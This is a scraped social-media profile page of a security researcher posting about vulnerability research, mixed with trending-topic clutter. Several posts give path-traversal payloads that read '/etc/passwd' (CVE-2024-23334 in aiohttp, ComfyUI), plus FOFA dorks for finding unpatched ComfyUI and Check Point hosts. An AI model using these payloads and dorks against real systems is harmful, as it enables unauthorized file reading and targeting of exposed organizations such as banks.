W01fh4cker
@W01fh4cker
Followers
2,077
Following
1,140
Media
41
Statuses
334
Explore trending content on Musk Viewer
Iran
• 521242 Tweets
Argentina
• 434309 Tweets
Kyle
• 277870 Tweets
Shapiro
• 238751 Tweets
Sunderland
• 164932 Tweets
Enrique Márquez
• 121536 Tweets
オフサイド
• 112060 Tweets
Francia
• 102813 Tweets
#ErdoğanınYanındayız
• 92051 Tweets
Mascherano
• 71805 Tweets
Emily
• 69963 Tweets
pastor
• 66757 Tweets
Julian
• 62614 Tweets
Ron Paul
• 49253 Tweets
Arabia
• 44298 Tweets
#FRAARG
• 43120 Tweets
Angola
• 34148 Tweets
Game Informer
• 30986 Tweets
BAUTISTA EN EL GRAN REX
• 30282 Tweets
Hepimiz Erdoğan'ız
• 27266 Tweets
Fresh News for $XRP Holders
• 24965 Tweets
Joshua Cheptegei
• 21124 Tweets
準々決勝進出
• 20416 Tweets
Zenón
• 17451 Tweets
Equi
• 17109 Tweets
Simeone
• 16952 Tweets
Otamendi
• 16701 Tweets
ロッキン
• 16145 Tweets
Gabriel Sara
• 15956 Tweets
FGOフェス
• 14872 Tweets
Almada
• 14418 Tweets
BRAND NEW DÍA
• 14000 Tweets
Echeverri
• 11456 Tweets
Aerosmith
• 11140 Tweets
Harmeet
• 10133 Tweets
Pinned Tweet
昨天文章发出后访问量太大,导致阿里云oss不断告警欠费,因此干脆关了博客,文章开源至github:
3
63
218
又是一篇费劲心血的文章,32000字,配图206张,看完可以完全零基础从0到1掌握Java内存马,由于公众号发文字数限制,因此分几次发出,完整的请见我的博客,会持续更新;师傅们若在阅读过程中发现问题,可以直接私聊我,会在下次文章的开头作感谢。博客文章地址:
15
134
446
CVE-2024-23334
Poc for windows: /static/../D:\flag.txt
Poc for Linux: /static/../../../../etc/passwd [need to fuzz "../"]
#aiohttp
#vulnerability
8
97
316
0
68
229
Fofa Dork:
title="ComfyUI" && header!="aiohttp/3.9.3" && header!="aiohttp/3.9.2"
PAYLOAD:
/extensions/../../../../../../../../../etc/passwd🙆
📢📢
#CVE
-2024-23334
The vulnerability allows an attacker to read leaked source code, database configuration files, etc., resulting in a highly insecure web site.
#cybersecurity
#vulnerability
#infosecurity
learn more:
0
5
11
2
47
190
0
36
124
0
33
101
用go语言实现通过dcerpc和ntlmssp获取Windows远程主机信息,代码翻译自Z20攻防的komomon师傅写的脚本。
源脚本地址(Python实现):
本脚本地址(Golang实现):
2
13
55
继续感慨pen4uin师傅真厉害,写的工具就是我梦想中的样子,无论是ui层面代码层面😭
1
11
53
2
18
42
自己写的一个用于在Linux x86_64上面安装并切换多个java版本的脚本,适用于代码审计工作者。因为装环境太累了,还是自动化舒服。
7
11
38
The impact of the vulnerability is limited at present, but thanks to
@chudyPB
for providing a clever bypass idea.
Simple Poc:
#redteam
#sharepoint
#cve
#BugBountyHunter
1
13
38
Has anyone successfully reproduced Microsoft Sharepoint XXE (CVE-2024-30043)? I'm stuck here. "file:///localhost\c$/sites/cvetest/poc.xml" doesn't seem to help me get the unrestricted policy. Why is that? Can you give me some advice?
0
9
30
Premise:
- a low-privilege user
- have permission to execute scripts
Exp:
#redteam
#bugbounty
#bugbountytips
#zabbix
0
9
29
FOFA: title="Check Point SSL Network Extender"
Observed several LATAM banks (CL,AR,CO,BR) vulnerable to this!!! Also, IT providers!
#csirt
#ir
#checkpoint
CVE-2024-24919
@1ZRR4H
5
64
253
1
9
23
Good writeupꉂ ೭(˵¯̴͒ꇴ¯̴͒˵)౨”
0
9
21
1
3
17
下午的时候在yakit群里发现有人(利刃信安的号主)说是发现了个若依的0day,我点开图片看看感觉还煞有其事,但是感觉这种洞在的话应该早就被发现了。
于是我在github直接开搜关键词getImage和imageUrl,结果符合的就这一个仓库,并且是这个人使用了若依组组件并写了个接口方便测试。
(1/n)
3
1
14
Thanks to Master Outmansec for the PR! Now VcenterKit supports macOS. ✨ Project link:
1
1
10
The dust has settled, and the reason why CVE-2024-30043 failed to reproduce has been found. Windows Server has not been updated:
0
0
7
@momika233
Fofa:
- app="Chamilo"
- header="x-powered-by: Chamilo"
Shodan:
- http.component:"Chamilo"
- x-powered-by: Chamilo
1
2
8
@Skyworship2
那包是这样的,我在Microsoft Sharepoint xxe新洞上面研究了三天,每天投入很长时间,最后写一个文章,那是绝对比不上人家往公众号上面发poc发什么hw蓝队文章来的阅读量高,因为研究调试分析这种大型框架很痛苦,但是只有这种痛苦的过程才能帮助人提升。
1
0
6
事情过去两天,还是想忍不住说,风气既如此,还是不去惹的一声腥比较好。投机倒把者太多,不过很快我所有号都会注销了,干活去了,眼不见心即不累。
6
1
6
@muWpPzThmh12LLw
会的,这就是我为什么还没写完就发了,typro底下显示25,000多字,然后每次打开会有一点卡顿,我之前用雨靴写差不多2万字不到就开始卡了,而且语雀卡顿情况非常严重,毕竟是electron应用
1
0
3
will publish
We've recreated a proof-of-concept for the SysAid CVE-2023-47246 remote code execution and compromise -- blog post coming ASAP😜
Big thanks to
@gleeda
@HuskyHacksMK
@DaveKleinatland
@calebjstewart
and the whole
@HuntressLabs
crew helping dig into this one!
7
86
407
0
1
3
🥹🥹
非常感谢各位师傅的关注和支持🥰最近关注者数量突破5K啦~
如果对网络安全感兴趣,可以关注以下列表:
列表收录要符合四个条件:1、推主是国人 2、在网络安全行业 3、能长期更新推文 4、不涉及敏感内容
有想要收录的师傅可以私信我,欢迎交流哈哈😄
#CyberSecurity
#hackers
8
21
61
0
0
2
@chudyPB
@dustin_childs
May I know the specific version you used to reproduce the vulnerability? I have never been able to reproduce it successfully under 16.0.0.10337. Thank you very much!
1
0
1
@Skyworship2
@sirifu4k1
I just learned that nuclei v3 already supports inserting additional python code in yaml files🥰, which is really exciting and surprising. I was still stuck in v2 before, haha
0
0
2
@joel_land
Thank you very much for your valuable hands-on experience, I will continue testing to see what went wrong.
1
0
2
2
0
2
@clairexiaotong
@SEEMsec
理解原理,举一反三,用已知解未知。各个知识点组成的图谱能在你脑海里面快速呈现,指哪讲哪,对每个漏洞的利用手法有了解,能够把所学用于实战,不用工具照样可以熟练地利用,算入门。比如mysql/mssql/oracle的sql注入的语句,随手就能敲出来(当然这仅仅是个小例子)。
1
0
2
@chudyPB
@dustin_childs
The dust has settled, and the reason why the reproduction of CVE-2024-30043 failed has been found. I did not update Windows Server. Thank you very much for your selfless and accurate help!
0
1
2
@Tagashy69
In addition, I saw this vulnerability before on DUCTF2023: , so if the question was published before the vulnerability was submitted to cve, I think this It really can’t be called a new vulnerability
1
0
2
从B站上看到的,byd转载投自制,翻了下原视频:
《Attack and Defend: Leveraging AWS Serverless Technology for End-to-End C2》,主讲人是Michael Long,AWS 的网络安全工程师;曾在美国陆军网络保护旅、陆军网络司令部和 MITRE 等组织工作。
0
0
2
直接本地搭建,发现确实应该就是这个仓库的,然后他应该是给代码改了下,支持file协议了,或者开了ftp。白激动一场哈哈哈
(1/2)
0
0
2
0
0
1